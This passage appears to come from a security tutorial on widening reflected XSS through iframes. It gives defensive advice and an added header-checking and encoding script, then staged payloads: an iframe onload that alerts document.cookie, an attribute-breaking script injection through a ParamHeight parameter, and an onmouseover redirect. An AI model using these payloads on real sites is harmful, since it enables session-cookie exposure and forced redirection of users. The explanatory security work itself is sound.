If this is the case, the attacker can expand the XSS attack to any page within the same domain that can be persuaded to load within an
<iframe> on the page with the XSS vulnerability.
To defend against this, send the X-Frame-Options: DENY header and/or always correctly encode all user-submitted data (that is, never have an XSS vulnerability on your site - easier said than done).
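As an added example (not code from the original post), the JavaScript below classifies a response's framing policy from its X-Frame-Options and Content-Security-Policy frame-ancestors headers, and shows an attribute-safe encoder for the kind of user-supplied value this page reflects into the iframe markup; the header sets are constructed samples.

```javascript
// Added example, not from the original post. Header sets below are constructed.

// Return "deny", "sameorigin" or "allowed" for a map of response headers.
// A CSP frame-ancestors directive takes precedence over X-Frame-Options.
function framingPolicy(headers) {
  const get = (name) => {
    const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
    return key ? headers[key] : undefined;
  };
  const csp = get("content-security-policy");
  if (csp) {
    const directive = csp.split(";").map((d) => d.trim())
      .find((d) => d.toLowerCase().startsWith("frame-ancestors"));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1)
        .map((s) => s.toLowerCase().replace(/^'|'$/g, ""));
      if (sources.length === 1 && sources[0] === "none") return "deny";
      if (sources.length === 1 && sources[0] === "self") return "sameorigin";
      return "allowed"; // explicit allow-list: listed origins may frame the page
    }
  }
  const xfo = get("x-frame-options");
  if (xfo) {
    const v = xfo.trim().toUpperCase();
    if (v === "DENY") return "deny";
    if (v === "SAMEORIGIN") return "sameorigin";
  }
  return "allowed"; // no framing restriction at all: the weak configuration
}

// Encode text for HTML body and attribute contexts, so a reflected value
// such as an iframe height cannot close the attribute and add a handler.
function htmlEncode(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;",
                '"': "&quot;", "'": "&#39;", "`": "&#96;" };
  return String(text).replace(/[&<>"'`]/g, (c) => map[c]);
}

// Constructed samples: the weak response beside the hardened one.
const weakHeaders = { "Content-Type": "text/html" };
const hardenedHeaders = {
  "Content-Type": "text/html",
  "Content-Security-Policy": "frame-ancestors 'none'",
  "X-Frame-Options": "DENY",
};
```

A response whose policy comes back "allowed" can be framed by any origin, which is the precondition for the iframe-based expansion described above.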
Below we look at a few examples of IFRAMEs and how they can be combined with XSS to display different information.
You can view a video demonstration of all of the examples below here - https://youtu.be/t5jdgj8ihwY
Stage 1 - Load the cookie of the existing user
Here we can use the following to display the current user's session cookie, reflected back to the page, because an XSS vulnerability is present on the server.
<IFRAME width="420" height="315" frameborder=0 onload="alert(document.cookie)"></IFRAME>&ParamHeight=250
Or using Script Tags
Stage 2 - Loading any text from the URL into the browser via reflected XSS
></iframe><script>alert(`THIS IS A BACKTICK`);</script><iframe frameborder="0%EF%BB%BF&ParamHeight=250
Stage 3 - Using the 'mouseover' function
Here we use the 'mouseover' event handler to redirect the user to a custom-defined website as soon as the user's cursor moves into the iframe area.
You can view an example of this here - https://youtu.be/t5jdgj8ihwY
<IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZrg'"></IFRAME>&ParamHeight=250